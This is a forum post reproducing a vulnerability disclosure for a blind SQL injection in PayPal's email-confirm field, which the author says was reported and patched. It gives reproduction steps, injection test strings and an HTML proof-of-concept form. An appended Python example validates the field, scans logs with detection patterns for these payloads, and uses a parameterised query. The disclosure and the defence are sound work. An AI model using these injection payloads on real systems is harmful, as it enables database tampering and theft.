#1, 17:56
Banned
Location: DE
Registered: 18.12.2010
Posts: 1,538
Reputation: 51 / 0
Paypal.com Blind SQL Injection

Paypal.com Blind SQL Injection


The blind SQL injection vulnerability can be exploited by remote attackers with a low-privileged application user account and
without required user interaction. For demonstration or to reproduce ...

URL1: Request a Session with 2 different mails (Step1)
https://www.paypal.com/de/ece/cn=060...iliuty-lab.com
https://www.paypal.com/de/ece/cn=060...x445@gmail.com

URL2: Injection into ID Confirm Field (Step2)
https://www.paypal.com/de/cgi-bin/we...ssword-submit&
dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846

1. Open the PayPal website and log in as a standard user with a restricted account
2. Switch to the webscr > Confirm Email module of the application
3. Request a login confirm ID when processing to load a reset
4. Take the valid confirm number from the mail and insert it into the email confirm number verification module input fields
5. Switch to the last char of the valid confirm number in the input field and inject your own SQL commands as a check to prove the validation

Test Strings:
-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'
-1'+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1--1'
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=-1'

6. Normally the website with the generated ID confirm button is bound to the standard template.
7. Inject substrings with the id -1+sql-query to prove blind injections in the input field
8. The bottom bar gets loaded as the result of the successfully executed SQL query
9. Now the remote attacker can manipulate the PayPal core database with a valid confirm number + his own SQL commands

Bug Type: Blind SQL INJECTION
SESSION: DE - 22:50 -23:15 (paypal.com)
Browser: Mozilla Firefox 18.01

PoC:
<form method="post" action="https://www.paypal.com/de/cgi-bin/webscr?cmd=_confirm-email-submit&dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846" class="">
  <p class="group">
    <label for="login_confirm_number_id"><span class="labelText"><span class="error">Please enter it here</span></span></label>
    <span class="field"><input id="login_confirm_number_id" class="xlarge" name="login_confirm_number" value="06021484023174514599-1+[BLIND SQL-INJECTION!]--" type="text"></span>
  </p>
  <p class="buttons"><input name="confirm.x" value="Confirm" class="button primary" type="submit"></p>
  <input name="form_charset" value="UTF-8" type="hidden">
</form>

Note: Always send the requests with the id to reproduce the issue. (-) is not possible as the first char of the input request.

Example(Wrong): -1+[SQL-Injection]&06021484023183514599
Example(Right): 06021484023183514599-1+[SQL-Injection]--
Example(Right): 06021484023183514599-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'-1'--

Note:
After the injection was successful 2 times because of my check, the PayPal website opened a security issue report message box as exception handling.
I included the details and information of my test and explained the issue, and a short time later it was patched.
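The following is an added example, not code from the post or from PayPal, written from the defender's side of the issue described above. It assumes the confirm number is a bare 20-digit value (as the ids in the post are) and builds three pieces around that assumption: an allow-list validator for the `login_confirm_number` field, a log scanner that flags the boolean-based blind-injection signatures visible in the post's test strings (`AND IF(`, `SUBSTRING(VERSION()`, a trailing `--`, a quote followed by `AND`/`OR`), and a parameterised lookup against a constructed in-memory SQLite table so the database never interprets the submitted value as SQL. The table name `confirm_requests`, the sample log lines, and the `user@example.com` row are constructed for the demo.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Assumption: a legitimate confirm number is exactly 20 decimal digits (as in the post),
# so an allow-list pattern is the first line of defence; anything appended fails it.
CONFIRM_NUMBER_RE = re.compile(r"\d{20}")

# Boolean-based blind SQLi signatures, derived from the test strings in the post.
BLIND_SQLI_SIGNATURES = {
    "and_if": re.compile(r"\bAND\s+IF\s*\(", re.IGNORECASE),
    "substring_version": re.compile(r"SUBSTRING\s*\(\s*VERSION\s*\(\s*\)", re.IGNORECASE),
    "trailing_comment": re.compile(r"--\s*$"),
    "quote_then_logic": re.compile(r"'\s*(AND|OR)\b", re.IGNORECASE),
}


def is_valid_confirm_number(value: str) -> bool:
    """Accept only a bare 20-digit confirm number; '...-1 AND IF(...)' style suffixes fail."""
    return CONFIRM_NUMBER_RE.fullmatch(value) is not None


def find_sqli_signatures(raw_param: str) -> list:
    """Return the names of the signatures matched by a URL-encoded form parameter."""
    decoded = unquote_plus(raw_param)  # '+' becomes a space, %xx sequences are decoded
    return [name for name, rx in BLIND_SQLI_SIGNATURES.items() if rx.search(decoded)]


# Constructed sample request-log lines (not real traffic): path, cmd, and the
# login_confirm_number parameter as a body-logging proxy might record it.
SAMPLE_LOG = """\
POST /de/cgi-bin/webscr cmd=_confirm-email-submit login_confirm_number=06021484023174514599
POST /de/cgi-bin/webscr cmd=_confirm-email-submit login_confirm_number=06021484023174514599-1+AND+IF(SUBSTRING(VERSION(),1,1)=5,1,2)=1--
POST /de/cgi-bin/webscr cmd=_confirm-email-submit login_confirm_number=06021484023174514599%27+OR+1=1--
POST /de/cgi-bin/webscr cmd=_confirm-email-submit login_confirm_number=abc
"""

PARAM_RE = re.compile(r"login_confirm_number=(\S*)")


def scan_log(log_text: str) -> list:
    """Classify each logged request: is the id well-formed, and which signatures fire."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = PARAM_RE.search(line)
        if not m:
            continue
        raw = m.group(1)
        findings.append({
            "line": lineno,
            "valid_format": is_valid_confirm_number(unquote_plus(raw)),
            "signatures": find_sqli_signatures(raw),
        })
    return findings


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the application's confirm-request store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE confirm_requests (confirm_number TEXT PRIMARY KEY, email TEXT)")
    conn.execute("INSERT INTO confirm_requests VALUES ('06021484023174514599', 'user@example.com')")
    conn.commit()
    return conn


def lookup_confirm_record(conn: sqlite3.Connection, confirm_number: str):
    """Hardened lookup: validate the format first, then bind the value as a parameter.

    Even if validation were skipped, the '?' placeholder makes the driver pass the
    whole string as a literal, so an appended 'AND IF(...)' is compared, not executed.
    """
    if not is_valid_confirm_number(confirm_number):
        return None
    row = conn.execute(
        "SELECT email FROM confirm_requests WHERE confirm_number = ?",
        (confirm_number,),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    db = build_demo_db()
    print(lookup_confirm_record(db, "06021484023174514599"))
    print(lookup_confirm_record(db, "06021484023174514599-1 AND IF(SUBSTRING(VERSION(),1,1)=5,1,2)=1--"))
```

The scanner is deliberately narrow: it matches the exact constructs the post demonstrates, which keeps false positives low on a numeric field but will not catch a differently shaped payload. The validator and the bound parameter are the controls that actually close the issue; the log signatures are there to tell you when someone is probing the field in the way the post describes.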